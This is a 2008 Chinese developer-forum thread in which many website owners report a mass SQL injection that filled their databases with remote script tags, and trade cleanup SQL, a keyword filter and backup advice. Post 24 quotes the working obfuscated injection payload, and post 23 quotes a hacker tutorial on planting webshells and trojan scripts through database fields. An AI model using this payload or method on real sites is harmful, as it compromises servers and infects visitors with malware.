首页 新闻 论坛 群组 Blog 文档 下载 读书 Tag 网摘 搜索 .NET Java 游戏 视频 人才 外包 培训 数据库 书店 程序员
中国软件网
欢迎您:游客 | 登录 注册 帮助
    • 我的网站被黑了,网站内尽是:“</title></pre>><script src=http://sb.5252.ws:88/107/1.js></script><”,网页内容都没了,请教怎么处理,谢谢!
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-06 20:30:37 楼主
    我的网站被黑了,网站内尽是:“ </title> </pre>> <script src=http://sb.5252.ws:88/107/1.js> </script> <”,网页内容都没了,请教怎么处理,谢谢!
    20  修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-06 20:34:391楼 得分:0
    去掉中间的脚本语句就行了啥,呵呵
    中招了,
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 01:21:222楼 得分:0
    SQL数据库一个表的title字段被加了代码

    见  图 

    我要怎么才能批量的删除掉这个代码,而不影响title呢
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 01:22:343楼 得分:0
    对不对,是这样的吧
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 01:54:554楼 得分:0
    遇到同样的问题 从 五月四号开始的 本来想来这发帖求助,来了之后发现这个问题很多。。。。难道是大范围的灾难?
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 08:30:505楼 得分:0
    同问,晕死,从4号开始就被频繁的修改数据库的内容.
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • qiuming0306
    • 等级:
    发表于:2008-05-07 08:57:156楼 得分:0
    然后安装杀毒软件杀毒@!批量删除就是了!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 08:57:277楼 得分:0
    请问楼上的好了吗,我的也是啊,请问删除语句怎么写啊,我是菜鸟啊
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • dawugui
    • 等级:
    发表于:2008-05-07 09:04:248楼 得分:0
    数据库被注入攻击  所有文本型字下段数据都被加了    <script_src=http://ucmal.com/0.js> </script>
    怎么删掉?

    SQL code
    
DECLARE @fieldtype sysname
SET @fieldtype='varchar'

--删除处理
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update '+QUOTENAME(o.name)
    +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script_src=http://ucmal.com/0.js> </script>'','''')'
FROM sysobjects o,syscolumns c,systypes t
WHERE o.id=c.id 
    AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
    AND c.xusertype=t.xusertype
    AND t.name=@fieldtype
EXEC sp_MSforeach_Worker @command1=N'?'
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 09:15:029楼 得分:0
      仅仅这样处理是远远不够的,主要市你要修改程序,防止SQL注入.
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 09:37:3410楼 得分:0
    你这问题前两天老乌龟回答过,
    http://topic.csdn.net/u/20080504/20/763ed034-317a-4695-a476-26317b905012.html
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 15:43:4311楼 得分:0
    不知道楼主的网站是什么的?asp、php还是.net的程序?如果是.net的程序 我可以提供一个防止sql注入的语句(过滤敏感语句的仅供参考)方式如下:在Global.asax文件下面加入如下代码:
    void Application_BeginRequest(Object sender, EventArgs e)
        {
            StartProcessRequest();

        }

        #region SQL注入式攻击代码分析
        /// <summary>
        /// 处理用户提交的请求
        /// </summary>
        private void StartProcessRequest()
        {
            try
            {
                string getkeys = "";
                string sqlErrorPage = "../default.aspx";//转向的错误提示页面
                if (System.Web.HttpContext.Current.Request.QueryString != null)
                {

                    for (int i = 0; i < System.Web.HttpContext.Current.Request.QueryString.Count; i++)
                    {
                        getkeys = System.Web.HttpContext.Current.Request.QueryString.Keys[i];
                        if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.QueryString[getkeys]))
                        {
                            System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);
                            System.Web.HttpContext.Current.Response.End();
                        }
                    }
                }
                if (System.Web.HttpContext.Current.Request.Form != null)
                {
                    for (int i = 0; i < System.Web.HttpContext.Current.Request.Form.Count; i++)
                    {
                        getkeys = System.Web.HttpContext.Current.Request.Form.Keys[i];
                        if (getkeys == "__VIEWSTATE") continue;
                        if (!ProcessSqlStr(System.Web.HttpContext.Current.Request.Form[getkeys]))
                        {
                            System.Web.HttpContext.Current.Response.Redirect(sqlErrorPage);
                            System.Web.HttpContext.Current.Response.End();
                        }
                    }
                }
            }
            catch
            {
                // 错误处理: 处理用户提交信息!
            }
        }
        /// <summary>
        /// 分析用户请求是否正常
        /// </summary>
        /// <param name="Str">传入用户提交数据 </param>
        /// <returns>返回是否含有SQL注入式攻击代码 </returns>
        private bool ProcessSqlStr(string Str)
        {
            bool ReturnValue = true;
            try
            {
                if (Str.Trim() != "")
                {
                    string SqlStr = "and ¦exec ¦insert ¦select ¦delete ¦update ¦count ¦* ¦chr ¦mid ¦master ¦truncate ¦char ¦declare";

                    string[] anySqlStr = SqlStr.Split(' ¦');
                    foreach (string ss in anySqlStr)
                    {
                        if (Str.ToLower().IndexOf(ss) >= 0)
                        {
                            ReturnValue = false;
                            break;
                        }
                    }
                }
            }
            catch
            {
                ReturnValue = false;
            }
            return ReturnValue;
        }
        #endregion
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • sandyxxx
    • 等级:
    发表于:2008-05-07 16:30:2012楼 得分:0
    我数据库中是这样的代码
    </title> </pre>> <script src=htt </title> </pre>> <scriptsrc=http://sb.5252.ws:88/107/1.js> </script> <
    和你差不多

    现在还没解决办法,只能恢复以前的备份
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • chenjunsheep
    • 等级:
    发表于:2008-05-07 16:46:3813楼 得分:0
    明显的SQL注入,LZ的网页安全做得不太好啊
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 17:51:2214楼 得分:0
    同样的问题,从5号起服务器网站天天遭,至今没找到完整的解决方案,只能靠恢复,最近是怎么了,发现很多网站都遭了,有没有谁能提出个解决方案啊。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-07 17:56:3315楼 得分:0
    我也是,天天被玩~~一直找各种方法解决,就是不行,大家有没有好的方法,分享下.
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • sandyxxx
    • 等级:
    发表于:2008-05-07 19:27:0116楼 得分:0
    我这里也是从昨天开始的,每天中午,我去楼下吃饭,吃饭回来,网站崩溃

    也是靠恢复数据库来解决,没有什么其他办法,那些所谓的防注入程序什么用都不管
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-08 14:03:2417楼 得分:0
    怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?

    发表于:2008-05-07 16:30:2012楼 得分:0
    我数据库中是这样的代码
    </title> </pre>> <script src=htt </title> </pre>> <scriptsrc=http://sb.5252.ws:88/107/1.js> </script> <
    和你差不多

    现在还没解决办法,只能恢复以前的备份
    ——————————————————————————————
    很明显,你已经被强奸两次了。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • sandyxxx
    • 等级:
    发表于:2008-05-08 14:46:0618楼 得分:0
    引用 17 楼 csmayi 的回复:
    怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?怎么辦?

    发表于:2008-05-07 16:30:2012楼 得分:0 
    我数据库中是这样的代码 
    </title>  </pre>>  <script src=htt  </title>  </pre>>  <scriptsrc=http://sb.5252.ws:88/107/1.js>  </script>  < 
    和你差不多 

    现在还没解决办法,只能恢复以前的备份 
    ——————————————————————————————
    很明显,你已…

    是,今天已经是第三次了,我每个页面都防止过滤sql注入的代码了
    不管用,我把上传的程序也要终止吗?
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • utpcb
    • 等级:
    发表于:2008-05-08 14:50:4319楼 得分:0
    DECLARE @fieldtype sysname
    SET @fieldtype='varchar'

    --删除处理
    DECLARE hCForEach CURSOR GLOBAL
    FOR
    SELECT N'update '+QUOTENAME(o.name)
        +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ','' <script_src=http://ucmal.com/0.js> </script>'','''')'
    FROM sysobjects o,syscolumns c,systypes t
    WHERE o.id=c.id
        AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
        AND c.xusertype=t.xusertype
        AND t.name=@fieldtype
    EXEC sp_MSforeach_Worker @command1=N'?'


    在网上看看应该有脚本的 你下个防止注入的脚本哈哈加到你网站上
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-08 15:07:2020楼 得分:0
    光光删除是不够的,我发现他已经将原有的资料也覆盖掉了。
    我是最惨的,备份文件同样有问题,只能找两个月以前的备份恢复之前的内容,
    后面的几乎是手动在调整。

    另外,我这个系统用了很多年了,有几千个JSP页面,要修改程序几乎不可能。
    碰到这回事真是死的心都有!!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • sandyxxx
    • 等级:
    发表于:2008-05-08 23:14:2221楼 得分:0
    在网上看看应该有脚本的 你下个防止注入的脚本哈哈加到你网站上

    这个都是过了不齐作用,我估计是我们用的盗版sql2000闹的
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-08 23:32:1622楼 得分:0
    难道真的没人能解决么?
    我在网上找了一下,发现这个症状与前段时间遇到的chirenrou、chishuiniu病毒又很多相似的地方。
    还看到这条信息
    http://www.digitcare.com.cn/articles.asp?id=21
    这位同志说能解决这个问题,于是朋友说可能就是这个人制造的这个病毒。

    各位怎么看?
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:22:4023楼 得分:0

    http://www.520hack.com/donghua/donghua1/200701/4156.html

    大家还是看看这个吧。

    应该是数据库挂马的问题。

    我也中彩了。。。。


    好久没给大家做教程了,前阵子在火狐发了个思路,数据库挂马,超绝,删都删不掉,后来我测试成功了

    一直没时间做成教程,因为我中间去广东旅游啦,嘿。。。

    进入正题,我是在本地测试的,因为我之前拿下一个站,在挂马,但是管理员老是把我的代码删了,而且

    改了后台又改了数据库名,到最后我连修改index.asp,conn.asp的权限都没有了,所以就有了这个教程。

    今天我也就拿我拿到的那个站做演示吧。。错了,不是这个,晕,乱七八糟的,我得找找。。找到了,

    我记得这目录,万网的虚拟主机,这万网的虚拟主机说来也怪,旁注的话好多DB权限,可以列目录,要么

    是WEB数据分离,要么就是禁止MDB下载,这一个都是靠运气拿下的。。。

    看操作吧,嘿,是一样吧。。我入侵之后第一件事就是下载整站源玛哈。数据库是ASP后缀的,正因为这样

    我才入侵了,也正是有了挂马的思路,先给大家做个一句话的演示吧。。我现在提交一句话,返回的信息

    应该是乱码,是乱码吧,,我现在插入一句话看看,这个后台根本就没有可以上传的地方,但却是数据库是

    ASP的所以一句话就把他给搞定了,这里也给那些傻鸟一个思路,在没有上传的前提下拿WEBSHELL的思路。

    我在添加管理员帐号,而帐号密码全部都写一句话,现在再用一句话连接,嘿,进来了吧,有了小马了。。

    这样一来的话管理员肯定会知道我们怎么入侵的,我们把一句话删除再看看,哈哈,想到了没有。。

    就算把一句话删除了也没用,照样连接,因为一句话已经写入数据库里了,是没法删除的,至少我都不知道

    怎么删除,接下来就挂马吧,我系统打了MS065014的补丁,我就用另外一个网马掩饰吧,做网马我就不多

    说了,我用这个做演示,网马测试成功,我们再做JS文件,因为添加帐号密码的时候是有字符限制的,太

    长了就不会有效果而且也添加不进去,我这是节省字符全部是1,


    <script src="http://127.0.0.1/1.js"> </script>

    这是调用JS的代码,正好可以加进去,好了,我们再来打开网页。中马了吧,然后我们再把JS代码删除。

    再打开网页,再打开一下,仔细看左下角哦,看最上面,首页调用了数据库中的JS代码吧,index.asp

    文件里没有JS代码哦,不要说我弄假哈。

    最后简单说一下原理吧,index为首页文件,打开之后要调用conn.asp或md5.asp等数据文件,转来转去之后

    肯定要转像数据库啦,既然转向了数据库就调用了我们的网马,原理和用户密码验证一样的吧,这只是我的说法。

    而且我也只拿了这个整站的源码来做测试,其他的我就不清楚了,好了,废话这么多,该闪人了。

    新年到,祝大家肉鸡多多,再见。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 09:50:4224楼 得分:0
    把' ¦ ¦and ¦( ¦) ¦exec ¦insert ¦select ¦delete ¦update ¦count ¦* ¦% ¦chr ¦mid ¦master ¦truncate ¦char ¦declare这些字符过滤掉,再有注意大小写就OK了,我的网站是通过如下代码注入的 
    dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=['%2b@c%2b']%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F2536312532452536422536312533342533372532452537352537332F312E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 

    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    • zzyyc
    • 等级:
    发表于:2008-05-09 11:22:3525楼 得分:0
    发现最近sql 注入比较多,拿出来共享下,时长2小时。一次上传不了,分三次上传。免费共享。     
    《sql server 数据库的备份与恢复》 
    微软特约资深讲师 毛颉 


    http://topic.csdn.net/u/20080509/11/70ac59bd-d219-45c7-85ec-9d355398642c.html
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-09 17:32:4526楼 得分:0
    唉,我也是,真想不懂这些人怎么这么无聊。
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 21:22:0027楼 得分:0
    真是没有办法啊,急啊
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-11 21:48:1328楼 得分:0
    受灾的人很多啊,我也是,种马者真可恨!!!
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-13 11:37:5429楼 得分:0
    可惜现在还没有解决方案啊,.诶
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-13 13:42:5030楼 得分:0
    还待于解决啊?
    修改 删除 举报 引用 回复
    进入用户个人空间
    加为好友
    发送私信
    在线聊天
    发表于:2008-05-13 14:45:2031楼 得分:0
    引用 28 楼 haiyi124 的回复:
    受灾的人很多啊,我也是,种马者真可恨!!!
    修改 删除 举报 引用 回复